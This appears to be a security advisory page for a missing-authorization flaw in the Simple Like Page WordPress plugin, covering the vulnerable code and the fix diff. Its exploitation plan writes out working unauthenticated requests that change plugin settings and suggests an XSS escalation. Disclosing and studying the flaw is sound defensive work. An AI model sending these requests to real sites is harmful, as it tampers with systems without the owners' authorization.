Simple Like Page <= 1.5.3 - Missing Authorization
Description
The Simple Like Page plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.5.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=1.5.3What Changed in the Fix
Changes introduced in v2.0.0
Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2025-63022 ## 1. Vulnerability Summary The **Simple Like Page Plugin** (up to version 1.5.3) is vulnerable to **Missing Authorization** and **Insecure CSRF protection**. The plugin registers several functions on the `admin_init` hook that perform sensitive operati…
Show full research plan
Exploitation Research Plan - CVE-2025-63022
1. Vulnerability Summary
The Simple Like Page Plugin (up to version 1.5.3) is vulnerable to Missing Authorization and Insecure CSRF protection. The plugin registers several functions on the admin_init hook that perform sensitive operations (updating plugin options) without verifying the user's identity (capability check) or the request's authenticity (nonce check). Since admin_init is triggered during any request to /wp-admin/admin-ajax.php, even by unauthenticated users, an attacker can modify plugin settings remotely.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php(or any endpoint that triggersadmin_init). - Target Functions:
SFPlugin::saveOptionsandSFPlugin::ignoreNotices. - Authentication: None (Unauthenticated).
- Vulnerable Parameters:
sfp_options_saved(Trigger forsaveOptions)locale(The value to be saved into the database)sfp_ignore_notice(Trigger forignoreNotices)
3. Code Flow
- Entry Point: An HTTP request is sent to
/wp-admin/admin-ajax.php. - Hook Execution: WordPress initializes and fires the
admin_inithook. - Plugin Callback: The
SFPluginclass has registeredsaveOptionsandignoreNoticesto this hook insimple-facebook-plugin.php:add_action( 'admin_init', array( $this, 'saveOptions' ) ); add_action( 'admin_init', array( $this, 'ignoreNotices' ) ); - Vulnerable Logic (saveOptions):
The function lackspublic function saveOptions() { if ( isset( $_POST['sfp_options_saved'] ) ) { // Trigger check $options = $this->getPluginOptions(); $options['locale'] = strip_tags( $_POST['locale'] ); // Input update_option( $this->optionName, $options ); // Sink } }current_user_can()andcheck_admin_referer(), allowing any request with thesfp_options_savedPOST parameter to update thesimple_facebook_plugin_optionsoption.
4. Nonce Acquisition Strategy
No nonce is required. The vulnerable functions saveOptions() and ignoreNotices() do not call check_admin_referer() or wp_verify_nonce(). They rely solely on the presence of specific parameters (sfp_options_saved or sfp_ignore_notice).
5. Exploitation Strategy
The goal is to modify the locale setting of the plugin, which is stored in the simple_facebook_plugin_options option.
Step 1: Modify Plugin Settings (Locale)
- Tool:
http_request - Method:
POST - URL:
{{BASE_URL}}/wp-admin/admin-ajax.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
sfp_options_saved=1&locale=exploit_test_locale
Step 2: Disable Admin Notices
- Tool:
http_request - Method:
GET - URL:
{{BASE_URL}}/wp-admin/admin-ajax.php?sfp_ignore_notice=0
6. Test Data Setup
- Environment: A standard WordPress installation with Simple Like Page Plugin v1.5.3 installed and activated.
- Initial State:
- Check the current option value:
wp option get simple_facebook_plugin_options --format=json - Default should be
{"locale":"en_US"}.
- Check the current option value:
7. Expected Results
- The server will likely return a
0or200 OKresponse (typical foradmin-ajax.phpwhen no specific action is handled afteradmin_init). - The WordPress database option
simple_facebook_plugin_optionswill be updated with the newlocalevalue. - The WordPress database option
sfp_ignore_noticewill be set totrue.
8. Verification Steps
After performing the HTTP requests, verify the changes using WP-CLI:
Verify Locale Change:
wp option get simple_facebook_plugin_options --format=jsonExpected output:
{"locale":"exploit_test_locale"}Verify Notice Ignored:
wp option get sfp_ignore_noticeExpected output:
true
9. Alternative Approaches
If /wp-admin/admin-ajax.php is restricted or behaves unexpectedly, the same attack can be performed against /wp-admin/admin-post.php or simply the WordPress admin dashboard root /wp-admin/index.php, as admin_init fires on all of these for any user, and the plugin code does not check if the user is actually on a settings page.
Refined Locale Payload for XSS (Optional):
While the CVE is for Missing Authorization, the locale value is later reflected in views/view-page-plugin.php inside a <script> tag:
js.src = "//connect.facebook.net/<?php echo esc_js($locale); ?>/all.js#xfbml=1";
An attacker could attempt to break out of the URL context (though esc_js and strip_tags provide some protection) to escalate this to Unauthenticated XSS. However, for this PoC, modifying the setting is sufficient to demonstrate the Missing Authorization vulnerability.
Summary
The Simple Like Page plugin for WordPress is vulnerable to unauthorized modification of settings and notice dismissal due to missing capability and nonce checks in the saveOptions and ignoreNotices functions. These functions are hooked to admin_init, which can be triggered by unauthenticated users through endpoints like /wp-admin/admin-ajax.php.
Vulnerable Code
// simple-facebook-plugin.php (line ~89) add_action( 'admin_init', array( $this, 'saveOptions' ) ); add_action( 'admin_init', array( $this, 'ignoreNotices' ) ); --- // simple-facebook-plugin.php public function saveOptions() { if ( isset( $_POST['sfp_options_saved'] ) ) { $options = $this->getPluginOptions(); $options['locale'] = strip_tags( $_POST['locale'] ); update_option( $this->optionName, $options ); } }
Security Fix
@@ -265,6 +265,10 @@ public function saveOptions() { if ( isset( $_POST['sfp_options_saved'] ) ) { + if ( ! current_user_can( 'manage_options' ) ) { + return; + } + check_admin_referer( 'sfp_save_options_action', 'sfp_save_options_nonce' ); $options = $this->getPluginOptions(); $options['locale'] = strip_tags( $_POST['locale'] ); update_option( $this->optionName, $options ); } } public function ignoreNotices() { - if ( isset( $_GET['sfp_ignore_notice'] ) ) { + if ( isset( $_GET['sfp_ignore_notice'] ) && current_user_can( 'manage_options' ) ) { update_option( 'sfp_ignore_notice', true ); }
Exploit Outline
The vulnerability is exploited by sending a crafted HTTP request to any WordPress administrative endpoint (such as /wp-admin/admin-ajax.php) which triggers the admin_init hook. Because the plugin does not verify if the user has administrative privileges or if the request contains a valid security nonce, an unauthenticated attacker can supply the 'sfp_options_saved' POST parameter along with a 'locale' value to overwrite the plugin's configuration in the database. Similarly, the 'sfp_ignore_notice' GET parameter can be used to manipulate plugin notices.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.